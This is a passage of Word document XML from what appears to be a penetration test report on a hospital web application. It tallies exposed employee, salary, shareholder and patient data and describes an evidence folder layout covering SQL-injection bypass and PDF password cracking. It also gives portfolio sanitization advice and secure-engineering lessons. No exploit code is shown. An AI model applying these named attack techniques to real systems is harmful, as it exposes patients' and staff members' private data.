            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Employee identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30 records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enables identity correlation and targeted abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>National identifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30 values in source backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive personal identifier exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Direct contact data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30 email/phone sets in source backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Targeting and impersonation risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Compensation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30 salary values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Internal HR confidentiality exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shareholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10 records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Corporate ownership exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3 PDFs retrieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive clinical-data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Data minimization principle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The full raw SQL is retained as evidence because the authorized technical objective required analysis, but the narrative deliberately prefers aggregate statistics. This approach preserves proof while reducing unnecessary repetition of sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>18. Professional Evidence Packaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence quality is part of the security deliverable. The project package uses numbered folders so a reviewer can move from reconnaissance through exploitation, document recovery, database exposure and final reporting without relying on an undocumented personal workstation state.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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Package area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>00_Source_Archives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Preserve source material used as the basis for the assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>01_Assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authorization/scope reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>02_Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS/HTTP/application reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>03_Network_Scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Port and service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>04_Web_App_Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Browser/Burp screenshots and web evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>05_SQLi_and_Burp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Injection and request/response proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>06_Patient_Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Retrieved PDF artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>07_PDF_Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hashes and password-recovery outputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>08_Database_Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Captured SQL backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>09_Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report deliverables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10_Manifests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inventory and SHA-256 integrity records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Evidence naming convention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot names were normalized from informal filenames into descriptive, numbered names such as 04_SQLi_Auth_Bypass_Response.png and 06_Public_SQL_Backup.png. The goal is to make evidence self-describing and easier to review, archive and reference in future retests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>19. Portfolio Presentation Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The confidential technical report should not be uploaded verbatim to a public portfolio because it contains recovered passwords, patient-report artifacts and personal/corporate records. The project can still be presented strongly by publishing a sanitized case study that retains the attack narrative, sanitized screenshots, severity table, methodology, remediation and evidence methodology while removing credentials and personal identifiers.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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portfolio element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recommended public treatment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Project title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Independent Web Application Security Assessment &amp; Exploitation Case Study</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security Researcher / Penetration Tester — Chandrashekar Bala</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Core skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web pentesting, SQLi, authentication testing, Burp, Nmap, PDF security, evidence analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Impact statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Demonstrated authentication bypass and sensitive-data exposure in an authorized controlled environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use sanitized screenshots; redact cookies, identities and credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Show secure remediation examples rather than exploit secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Publish sanitized PDF; retain confidential evidence privately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Resume-ready project description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Independent Web Application Security Assessment — Conducted an authorized black-box assessment of a hospital web application; identified and manually validated SQL-injection authentication bypass, public database-backup exposure, directory indexing and sensitive patient-report retrieval; analyzed legacy PDF protection and performed authorized offline password recovery; quantified exposed HR/shareholder data; produced evidence-backed CVSS/CWE findings, remediation controls, detection logic and a retest runbook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>20. Lessons for Secure Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Security controls must be enforced where the sensitive action occurs, not only where the data is stored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A crawler exclusion is not an authorization boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A scanner result is not a substitute for a controlled manual reproduction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Encryption is not a replacement for access control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Error handling is part of the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Deployment hygiene can be as important as application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A high-quality finding includes a verification condition, not just a recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence preservation increases the credibility and long-term usefulness of a security assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>21. End-to-End Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This section reconstructs the compromise as an attacker would experience it while preserving the evidence boundary. The purpose is to show how individually small weaknesses compose into a materially larger security outcome.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
